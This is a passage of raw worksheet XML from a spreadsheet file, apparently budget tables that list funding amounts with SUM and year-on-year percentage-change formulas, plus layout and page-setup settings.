    <row r="25" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A25" s="196" t="s">
        <v>2358</v>
      </c>
      <c r="B25" s="197">
        <v>4452</v>
      </c>
    </row>
    <row r="26" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A26" s="199" t="s">
        <v>2359</v>
      </c>
      <c r="B26" s="200">
        <v>27960</v>
      </c>
    </row>
    <row r="27" s="207" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A27" s="216" t="s">
        <v>2360</v>
      </c>
      <c r="B27" s="216"/>
    </row>
    <row r="28" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B28" s="217"/>
    </row>
    <row r="29" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B29" s="217"/>
    </row>
    <row r="30" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B30" s="217"/>
    </row>
    <row r="31" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B31" s="217"/>
    </row>
    <row r="32" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B32" s="217"/>
    </row>
    <row r="33" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B33" s="217"/>
    </row>
    <row r="34" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B34" s="217"/>
    </row>
    <row r="35" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B35" s="217"/>
    </row>
    <row r="36" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B36" s="217"/>
    </row>
    <row r="37" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B37" s="217"/>
    </row>
    <row r="38" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B38" s="217"/>
    </row>
    <row r="39" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B39" s="217"/>
    </row>
    <row r="40" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B40" s="217"/>
    </row>
    <row r="41" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B41" s="217"/>
    </row>
    <row r="42" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B42" s="217"/>
    </row>
    <row r="43" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B43" s="217"/>
    </row>
    <row r="44" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B44" s="217"/>
    </row>
    <row r="45" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B45" s="217"/>
    </row>
    <row r="46" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B46" s="217"/>
    </row>
    <row r="47" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B47" s="217"/>
    </row>
    <row r="48" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B48" s="217"/>
    </row>
    <row r="49" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B49" s="217"/>
    </row>
    <row r="50" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B50" s="217"/>
    </row>
    <row r="51" s="207" customFormat="1" ht="14.4" spans="2:2">
      <c r="B51" s="217"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A27:B27"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet7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3" tint="0.8"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:B70"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B13" sqref="B13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelCol="1"/>
  <cols>
    <col min="1" max="1" width="67.4259259259259" style="184" customWidth="1"/>
    <col min="2" max="2" width="20" style="184" customWidth="1"/>
    <col min="3" max="235" width="10" style="184"/>
    <col min="236" max="236" width="50.4259259259259" style="184" customWidth="1"/>
    <col min="237" max="237" width="43" style="184" customWidth="1"/>
    <col min="238" max="250" width="10" style="184"/>
    <col min="251" max="16384" width="10" style="185"/>
  </cols>
  <sheetData>
    <row r="1" s="184" customFormat="1" ht="18" customHeight="1" spans="1:2">
      <c r="A1" s="186" t="s">
        <v>2361</v>
      </c>
      <c r="B1" s="187"/>
    </row>
    <row r="2" s="184" customFormat="1" ht="24.6" customHeight="1" spans="1:2">
      <c r="A2" s="188" t="s">
        <v>2362</v>
      </c>
      <c r="B2" s="188"/>
    </row>
    <row r="3" s="184" customFormat="1" ht="18" customHeight="1" spans="1:2">
      <c r="A3" s="189"/>
      <c r="B3" s="190" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="184" customFormat="1" ht="24.95" customHeight="1" spans="1:2">
      <c r="A4" s="191" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="192" t="s">
        <v>2339</v>
      </c>
    </row>
    <row r="5" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A5" s="193" t="s">
        <v>2363</v>
      </c>
      <c r="B5" s="194">
        <v>1129050</v>
      </c>
    </row>
    <row r="6" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A6" s="195" t="s">
        <v>2341</v>
      </c>
      <c r="B6" s="194">
        <f>B7+B10</f>
        <v>200374</v>
      </c>
    </row>
    <row r="7" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A7" s="196" t="s">
        <v>2364</v>
      </c>
      <c r="B7" s="197">
        <v>100000</v>
      </c>
    </row>
    <row r="8" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A8" s="196" t="s">
        <v>2343</v>
      </c>
      <c r="B8" s="197"/>
    </row>
    <row r="9" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A9" s="196" t="s">
        <v>2344</v>
      </c>
      <c r="B9" s="197">
        <v>100000</v>
      </c>
    </row>
    <row r="10" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A10" s="196" t="s">
        <v>2365</v>
      </c>
      <c r="B10" s="197">
        <f>B11+B12</f>
        <v>100374</v>
      </c>
    </row>
    <row r="11" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A11" s="196" t="s">
        <v>2343</v>
      </c>
      <c r="B11" s="197">
        <v>23976</v>
      </c>
    </row>
    <row r="12" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A12" s="196" t="s">
        <v>2344</v>
      </c>
      <c r="B12" s="197">
        <f>60000+16398</f>
        <v>76398</v>
      </c>
    </row>
    <row r="13" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A13" s="195" t="s">
        <v>2346</v>
      </c>
      <c r="B13" s="194">
        <f>B15+B16</f>
        <v>144860</v>
      </c>
    </row>
    <row r="14" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A14" s="196" t="s">
        <v>2366</v>
      </c>
      <c r="B14" s="197"/>
    </row>
    <row r="15" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A15" s="196" t="s">
        <v>2367</v>
      </c>
      <c r="B15" s="197">
        <v>100000</v>
      </c>
    </row>
    <row r="16" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A16" s="196" t="s">
        <v>2368</v>
      </c>
      <c r="B16" s="197">
        <f>B17+B20+B21</f>
        <v>44860</v>
      </c>
    </row>
    <row r="17" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A17" s="196" t="s">
        <v>2369</v>
      </c>
      <c r="B17" s="197">
        <f>B18+B19</f>
        <v>40374</v>
      </c>
    </row>
    <row r="18" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A18" s="196" t="s">
        <v>2370</v>
      </c>
      <c r="B18" s="197">
        <v>23976</v>
      </c>
    </row>
    <row r="19" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A19" s="196" t="s">
        <v>2371</v>
      </c>
      <c r="B19" s="197">
        <v>16398</v>
      </c>
    </row>
    <row r="20" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A20" s="196" t="s">
        <v>2372</v>
      </c>
      <c r="B20" s="197">
        <v>2664</v>
      </c>
    </row>
    <row r="21" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A21" s="196" t="s">
        <v>2373</v>
      </c>
      <c r="B21" s="197">
        <v>1822</v>
      </c>
    </row>
    <row r="22" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A22" s="198" t="s">
        <v>2374</v>
      </c>
      <c r="B22" s="194">
        <f>B23+B24</f>
        <v>1184564</v>
      </c>
    </row>
    <row r="23" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A23" s="196" t="s">
        <v>2343</v>
      </c>
      <c r="B23" s="194">
        <v>142796</v>
      </c>
    </row>
    <row r="24" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A24" s="196" t="s">
        <v>2344</v>
      </c>
      <c r="B24" s="194">
        <v>1041768</v>
      </c>
    </row>
    <row r="25" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A25" s="198" t="s">
        <v>2375</v>
      </c>
      <c r="B25" s="194">
        <f>B26</f>
        <v>32412</v>
      </c>
    </row>
    <row r="26" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A26" s="196" t="s">
        <v>2376</v>
      </c>
      <c r="B26" s="197">
        <f>B27+B28</f>
        <v>32412</v>
      </c>
    </row>
    <row r="27" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A27" s="196" t="s">
        <v>2377</v>
      </c>
      <c r="B27" s="197">
        <v>4452</v>
      </c>
    </row>
    <row r="28" s="184" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A28" s="199" t="s">
        <v>2378</v>
      </c>
      <c r="B28" s="200">
        <v>27960</v>
      </c>
    </row>
    <row r="29" s="184" customFormat="1" ht="33" customHeight="1" spans="1:2">
      <c r="A29" s="201" t="s">
        <v>2379</v>
      </c>
      <c r="B29" s="202"/>
    </row>
    <row r="30" s="184" customFormat="1" spans="1:2">
      <c r="A30" s="203"/>
      <c r="B30" s="204"/>
    </row>
    <row r="31" s="184" customFormat="1" spans="1:2">
      <c r="A31" s="203"/>
      <c r="B31" s="204"/>
    </row>
    <row r="32" s="184" customFormat="1" spans="1:2">
      <c r="A32" s="203"/>
      <c r="B32" s="204"/>
    </row>
    <row r="33" s="184" customFormat="1" spans="1:2">
      <c r="A33" s="203"/>
      <c r="B33" s="204"/>
    </row>
    <row r="34" s="184" customFormat="1" spans="1:2">
      <c r="A34" s="203"/>
      <c r="B34" s="204"/>
    </row>
    <row r="35" s="184" customFormat="1" spans="1:2">
      <c r="A35" s="203"/>
      <c r="B35" s="204"/>
    </row>
    <row r="36" s="184" customFormat="1" spans="1:2">
      <c r="A36" s="203"/>
      <c r="B36" s="204"/>
    </row>
    <row r="37" s="184" customFormat="1" spans="1:2">
      <c r="A37" s="203"/>
      <c r="B37" s="204"/>
    </row>
    <row r="38" s="184" customFormat="1" spans="2:2">
      <c r="B38" s="204"/>
    </row>
    <row r="39" s="184" customFormat="1" spans="2:2">
      <c r="B39" s="204"/>
    </row>
    <row r="40" s="184" customFormat="1" spans="2:2">
      <c r="B40" s="204"/>
    </row>
    <row r="41" s="184" customFormat="1" spans="2:2">
      <c r="B41" s="204"/>
    </row>
    <row r="42" s="184" customFormat="1" spans="2:2">
      <c r="B42" s="204"/>
    </row>
    <row r="43" s="184" customFormat="1" spans="2:2">
      <c r="B43" s="204"/>
    </row>
    <row r="44" s="184" customFormat="1" spans="2:2">
      <c r="B44" s="204"/>
    </row>
    <row r="45" s="184" customFormat="1" spans="2:2">
      <c r="B45" s="204"/>
    </row>
    <row r="46" s="184" customFormat="1" spans="2:2">
      <c r="B46" s="204"/>
    </row>
    <row r="47" s="184" customFormat="1" spans="2:2">
      <c r="B47" s="204"/>
    </row>
    <row r="48" s="184" customFormat="1" spans="2:2">
      <c r="B48" s="204"/>
    </row>
    <row r="49" s="184" customFormat="1" spans="2:2">
      <c r="B49" s="204"/>
    </row>
    <row r="50" s="184" customFormat="1" spans="2:2">
      <c r="B50" s="204"/>
    </row>
    <row r="51" s="184" customFormat="1" spans="2:2">
      <c r="B51" s="204"/>
    </row>
    <row r="52" s="184" customFormat="1" spans="2:2">
      <c r="B52" s="204"/>
    </row>
    <row r="53" s="184" customFormat="1" spans="2:2">
      <c r="B53" s="204"/>
    </row>
    <row r="54" s="184" customFormat="1" spans="2:2">
      <c r="B54" s="204"/>
    </row>
    <row r="55" s="184" customFormat="1" spans="2:2">
      <c r="B55" s="204"/>
    </row>
    <row r="56" s="184" customFormat="1" spans="2:2">
      <c r="B56" s="204"/>
    </row>
    <row r="57" s="184" customFormat="1" spans="2:2">
      <c r="B57" s="204"/>
    </row>
    <row r="58" s="184" customFormat="1" spans="2:2">
      <c r="B58" s="204"/>
    </row>
    <row r="59" s="184" customFormat="1" spans="2:2">
      <c r="B59" s="204"/>
    </row>
    <row r="60" s="184" customFormat="1" spans="2:2">
      <c r="B60" s="204"/>
    </row>
    <row r="61" s="184" customFormat="1" spans="2:2">
      <c r="B61" s="204"/>
    </row>
    <row r="62" s="184" customFormat="1" spans="2:2">
      <c r="B62" s="204"/>
    </row>
    <row r="63" s="184" customFormat="1" spans="2:2">
      <c r="B63" s="204"/>
    </row>
    <row r="64" s="184" customFormat="1" spans="2:2">
      <c r="B64" s="204"/>
    </row>
    <row r="65" s="184" customFormat="1" spans="2:2">
      <c r="B65" s="204"/>
    </row>
    <row r="66" s="184" customFormat="1" spans="2:2">
      <c r="B66" s="204"/>
    </row>
    <row r="67" s="184" customFormat="1" spans="2:2">
      <c r="B67" s="204"/>
    </row>
    <row r="68" s="184" customFormat="1" spans="2:2">
      <c r="B68" s="204"/>
    </row>
    <row r="69" s="184" customFormat="1" spans="2:2">
      <c r="B69" s="204"/>
    </row>
    <row r="70" s="184" customFormat="1" spans="2:2">
      <c r="B70" s="204"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A29:B29"/>
  </mergeCells>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="0.590277777777778" bottom="0.511805555555556" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" fitToWidth="0" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet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7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A4" sqref="A4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.14814814814815" defaultRowHeight="13.2" outlineLevelRow="6"/>
  <cols>
    <col min="1" max="1" width="89.7222222222222" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="57" customHeight="1"/>
    <row r="2" ht="57" customHeight="1"/>
    <row r="3" ht="148.8" spans="1:1">
      <c r="A3" s="78" t="s">
        <v>2380</v>
      </c>
    </row>
    <row r="4" ht="57" customHeight="1"/>
    <row r="5" ht="57" customHeight="1"/>
    <row r="6" ht="57" customHeight="1"/>
    <row r="7" ht="57" customHeight="1"/>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet7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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:H22"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane xSplit="3" ySplit="5" topLeftCell="D7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="7"/>
  <cols>
    <col min="1" max="1" width="22.2777777777778" style="144" customWidth="1"/>
    <col min="2" max="2" width="7.72222222222222" style="145" customWidth="1"/>
    <col min="3" max="3" width="7.72222222222222" style="146" customWidth="1"/>
    <col min="4" max="4" width="7.72222222222222" style="147" customWidth="1"/>
    <col min="5" max="5" width="28.4537037037037" style="144" customWidth="1"/>
    <col min="6" max="7" width="7.72222222222222" style="145" customWidth="1"/>
    <col min="8" max="8" width="7.72222222222222" style="147" customWidth="1"/>
    <col min="9" max="16384" width="10.2777777777778" style="144"/>
  </cols>
  <sheetData>
    <row r="1" ht="17.4" spans="1:1">
      <c r="A1" s="86" t="s">
        <v>2381</v>
      </c>
    </row>
    <row r="2" ht="28.5" customHeight="1" spans="1:8">
      <c r="A2" s="179" t="s">
        <v>2382</v>
      </c>
      <c r="B2" s="150"/>
      <c r="C2" s="150"/>
      <c r="D2" s="151"/>
      <c r="E2" s="150"/>
      <c r="F2" s="150"/>
      <c r="G2" s="150"/>
      <c r="H2" s="151"/>
    </row>
    <row r="3" ht="34.5" customHeight="1" spans="7:8">
      <c r="G3" s="152" t="s">
        <v>2383</v>
      </c>
      <c r="H3" s="153"/>
    </row>
    <row r="4" s="142" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A4" s="72" t="s">
        <v>2384</v>
      </c>
      <c r="B4" s="154" t="s">
        <v>2385</v>
      </c>
      <c r="C4" s="154" t="s">
        <v>2386</v>
      </c>
      <c r="D4" s="156" t="s">
        <v>2387</v>
      </c>
      <c r="E4" s="72" t="s">
        <v>2388</v>
      </c>
      <c r="F4" s="154" t="s">
        <v>2385</v>
      </c>
      <c r="G4" s="154" t="s">
        <v>2386</v>
      </c>
      <c r="H4" s="156" t="s">
        <v>2387</v>
      </c>
    </row>
    <row r="5" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A5" s="157" t="s">
        <v>2389</v>
      </c>
      <c r="B5" s="158">
        <v>1744</v>
      </c>
      <c r="C5" s="158">
        <v>1880</v>
      </c>
      <c r="D5" s="160">
        <f>(C5-B5)/B5*100</f>
        <v>7.79816513761468</v>
      </c>
      <c r="E5" s="161" t="s">
        <v>676</v>
      </c>
      <c r="F5" s="162"/>
      <c r="G5" s="162"/>
      <c r="H5" s="160"/>
    </row>
    <row r="6" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A6" s="163" t="s">
        <v>2390</v>
      </c>
      <c r="B6" s="164"/>
      <c r="C6" s="136"/>
      <c r="D6" s="160"/>
      <c r="E6" s="163" t="s">
        <v>2391</v>
      </c>
      <c r="F6" s="165"/>
      <c r="G6" s="166"/>
      <c r="H6" s="160"/>
    </row>
    <row r="7" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A7" s="167"/>
      <c r="B7" s="168"/>
      <c r="C7" s="166"/>
      <c r="D7" s="160"/>
      <c r="E7" s="180" t="s">
        <v>2392</v>
      </c>
      <c r="F7" s="181">
        <v>1744</v>
      </c>
      <c r="G7" s="181">
        <v>1880</v>
      </c>
      <c r="H7" s="160">
        <f>(G7-F7)/F7*100</f>
        <v>7.79816513761468</v>
      </c>
    </row>
    <row r="8" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A8" s="163"/>
      <c r="B8" s="168"/>
      <c r="C8" s="166"/>
      <c r="D8" s="160"/>
      <c r="E8" s="163" t="s">
        <v>2393</v>
      </c>
      <c r="F8" s="165"/>
      <c r="G8" s="165"/>
      <c r="H8" s="160"/>
    </row>
    <row r="9" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A9" s="163"/>
      <c r="B9" s="168"/>
      <c r="C9" s="166"/>
      <c r="D9" s="160"/>
      <c r="E9" s="163" t="s">
        <v>2394</v>
      </c>
      <c r="F9" s="165"/>
      <c r="G9" s="165"/>
      <c r="H9" s="160"/>
    </row>
    <row r="10" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A10" s="163"/>
      <c r="B10" s="168"/>
      <c r="C10" s="166"/>
      <c r="D10" s="160"/>
      <c r="E10" s="163" t="s">
        <v>2395</v>
      </c>
      <c r="F10" s="165"/>
      <c r="G10" s="166"/>
      <c r="H10" s="160"/>
    </row>
    <row r="11" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A11" s="163"/>
      <c r="B11" s="168"/>
      <c r="C11" s="166"/>
      <c r="D11" s="160"/>
      <c r="E11" s="163" t="s">
        <v>2396</v>
      </c>
      <c r="F11" s="165"/>
      <c r="G11" s="166"/>
      <c r="H11" s="160"/>
    </row>
    <row r="12" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A12" s="163"/>
      <c r="B12" s="168"/>
      <c r="C12" s="166"/>
      <c r="D12" s="160"/>
      <c r="E12" s="163" t="s">
        <v>2397</v>
      </c>
      <c r="F12" s="165"/>
      <c r="G12" s="165"/>
      <c r="H12" s="160"/>
    </row>
    <row r="13" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A13" s="163"/>
      <c r="B13" s="168"/>
      <c r="C13" s="166"/>
      <c r="D13" s="160"/>
      <c r="E13" s="163" t="s">
        <v>2398</v>
      </c>
      <c r="F13" s="165"/>
      <c r="G13" s="165"/>
      <c r="H13" s="160"/>
    </row>
    <row r="14" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A14" s="163"/>
      <c r="B14" s="168"/>
      <c r="C14" s="166"/>
      <c r="D14" s="160"/>
      <c r="E14" s="163" t="s">
        <v>2399</v>
      </c>
      <c r="F14" s="165"/>
      <c r="G14" s="160"/>
      <c r="H14" s="160"/>
    </row>
    <row r="15" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A15" s="163"/>
      <c r="B15" s="168"/>
      <c r="C15" s="166"/>
      <c r="D15" s="160"/>
      <c r="E15" s="163" t="s">
        <v>2400</v>
      </c>
      <c r="F15" s="165"/>
      <c r="G15" s="165"/>
      <c r="H15" s="160"/>
    </row>
    <row r="16" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A16" s="163"/>
      <c r="B16" s="168"/>
      <c r="C16" s="166"/>
      <c r="D16" s="160"/>
      <c r="E16" s="163" t="s">
        <v>2401</v>
      </c>
      <c r="F16" s="165"/>
      <c r="G16" s="165"/>
      <c r="H16" s="160"/>
    </row>
    <row r="17" s="178" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A17" s="182" t="s">
        <v>889</v>
      </c>
      <c r="B17" s="170">
        <f>SUM(B5:B16)</f>
        <v>1744</v>
      </c>
      <c r="C17" s="170">
        <f>SUM(C5:C16)</f>
        <v>1880</v>
      </c>
      <c r="D17" s="171">
        <f>(C17-B17)/B17*100</f>
        <v>7.79816513761468</v>
      </c>
      <c r="E17" s="182" t="s">
        <v>927</v>
      </c>
      <c r="F17" s="169">
        <f>SUM(F7:F16)</f>
        <v>1744</v>
      </c>
      <c r="G17" s="169">
        <f>SUM(G7:G16)</f>
        <v>1880</v>
      </c>
      <c r="H17" s="171">
        <f>(G17-F17)/F17*100</f>
        <v>7.79816513761468</v>
      </c>
    </row>
    <row r="18" s="143" customFormat="1" ht="26.25" customHeight="1" spans="1:8">
      <c r="A18" s="169"/>
      <c r="B18" s="170"/>
      <c r="C18" s="172"/>
      <c r="D18" s="160"/>
      <c r="E18" s="163"/>
      <c r="F18" s="165"/>
      <c r="G18" s="165"/>
      <c r="H18" s="160"/>
    </row>
    <row r="19" s="143" customFormat="1" ht="26.25" customHeight="1" spans="1:8">
      <c r="A19" s="163"/>
      <c r="B19" s="168"/>
      <c r="C19" s="166"/>
      <c r="D19" s="160"/>
      <c r="E19" s="163" t="s">
        <v>2402</v>
      </c>
      <c r="F19" s="165"/>
      <c r="G19" s="165"/>
      <c r="H19" s="160"/>
    </row>
    <row r="20" s="143" customFormat="1" ht="26.25" customHeight="1" spans="1:8">
      <c r="A20" s="163" t="s">
        <v>2403</v>
      </c>
      <c r="B20" s="168"/>
      <c r="C20" s="166"/>
      <c r="D20" s="160"/>
      <c r="E20" s="163" t="s">
        <v>2404</v>
      </c>
      <c r="F20" s="168"/>
      <c r="G20" s="166"/>
      <c r="H20" s="160"/>
    </row>
    <row r="21" s="178" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A21" s="183" t="s">
        <v>750</v>
      </c>
      <c r="B21" s="174">
        <f t="shared" ref="B21:G21" si="0">SUM(B17:B20)</f>
        <v>1744</v>
      </c>
      <c r="C21" s="174">
        <f t="shared" si="0"/>
        <v>1880</v>
      </c>
      <c r="D21" s="175">
        <f>(C21-B21)/B21*100</f>
        <v>7.79816513761468</v>
      </c>
      <c r="E21" s="183" t="s">
        <v>783</v>
      </c>
      <c r="F21" s="174">
        <f t="shared" si="0"/>
        <v>1744</v>
      </c>
      <c r="G21" s="174">
        <f t="shared" si="0"/>
        <v>1880</v>
      </c>
      <c r="H21" s="175">
        <f>(G21-F21)/F21*100</f>
        <v>7.79816513761468</v>
      </c>
    </row>
    <row r="22" spans="5:8">
      <c r="E22" s="176"/>
      <c r="F22" s="176"/>
      <c r="G22" s="176"/>
      <c r="H22" s="177"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="G3:H3"/>
  </mergeCells>
  <pageMargins left="0.7" right="0.31" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" fitToHeight="0" orientation="portrait"/>
  <headerFooter alignWithMargins="0"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet7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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:H22"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="2" ySplit="5" topLeftCell="C6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="L32" sqref="L32"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="7"/>
  <cols>
    <col min="1" max="1" width="22.2777777777778" style="144" customWidth="1"/>
    <col min="2" max="2" width="7.72222222222222" style="145" customWidth="1"/>
    <col min="3" max="3" width="7.72222222222222" style="146" customWidth="1"/>
    <col min="4" max="4" width="7.72222222222222" style="147" customWidth="1"/>
    <col min="5" max="5" width="28" style="144" customWidth="1"/>
    <col min="6" max="7" width="7.72222222222222" style="145" customWidth="1"/>
    <col min="8" max="8" width="7.72222222222222" style="147" customWidth="1"/>
    <col min="9" max="16384" width="10.2777777777778" style="144"/>
  </cols>
  <sheetData>
    <row r="1" ht="17.4" spans="1:1">
      <c r="A1" s="86" t="s">
        <v>2405</v>
      </c>
    </row>
    <row r="2" s="141" customFormat="1" ht="28.5" customHeight="1" spans="1:8">
      <c r="A2" s="148" t="s">
        <v>2406</v>
      </c>
      <c r="B2" s="148"/>
      <c r="C2" s="148"/>
      <c r="D2" s="149"/>
      <c r="E2" s="150"/>
      <c r="F2" s="150"/>
      <c r="G2" s="150"/>
      <c r="H2" s="151"/>
    </row>
    <row r="3" ht="34.5" customHeight="1" spans="7:8">
      <c r="G3" s="152" t="s">
        <v>2383</v>
      </c>
      <c r="H3" s="153"/>
    </row>
    <row r="4" s="142" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A4" s="72" t="s">
        <v>2384</v>
      </c>
      <c r="B4" s="154" t="s">
        <v>2407</v>
      </c>
      <c r="C4" s="155" t="s">
        <v>2408</v>
      </c>
      <c r="D4" s="156" t="s">
        <v>2387</v>
      </c>
      <c r="E4" s="72" t="s">
        <v>2388</v>
      </c>
      <c r="F4" s="154" t="s">
        <v>2407</v>
      </c>
      <c r="G4" s="155" t="s">
        <v>2408</v>
      </c>
      <c r="H4" s="156" t="s">
        <v>2387</v>
      </c>
    </row>
    <row r="5" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A5" s="157" t="s">
        <v>2389</v>
      </c>
      <c r="B5" s="158">
        <v>1880</v>
      </c>
      <c r="C5" s="159">
        <v>1800</v>
      </c>
      <c r="D5" s="160">
        <f>(C5-B5)/B5*100</f>
        <v>-4.25531914893617</v>
      </c>
      <c r="E5" s="161" t="s">
        <v>676</v>
      </c>
      <c r="F5" s="162"/>
      <c r="G5" s="162"/>
      <c r="H5" s="160"/>
    </row>
    <row r="6" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A6" s="163" t="s">
        <v>2390</v>
      </c>
      <c r="B6" s="164"/>
      <c r="C6" s="136"/>
      <c r="D6" s="160"/>
      <c r="E6" s="163" t="s">
        <v>2391</v>
      </c>
      <c r="F6" s="165"/>
      <c r="G6" s="166"/>
      <c r="H6" s="160"/>
    </row>
    <row r="7" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A7" s="167"/>
      <c r="B7" s="168"/>
      <c r="C7" s="166"/>
      <c r="D7" s="160"/>
      <c r="E7" s="163" t="s">
        <v>2392</v>
      </c>
      <c r="F7" s="165">
        <v>1880</v>
      </c>
      <c r="G7" s="165">
        <v>1800</v>
      </c>
      <c r="H7" s="160">
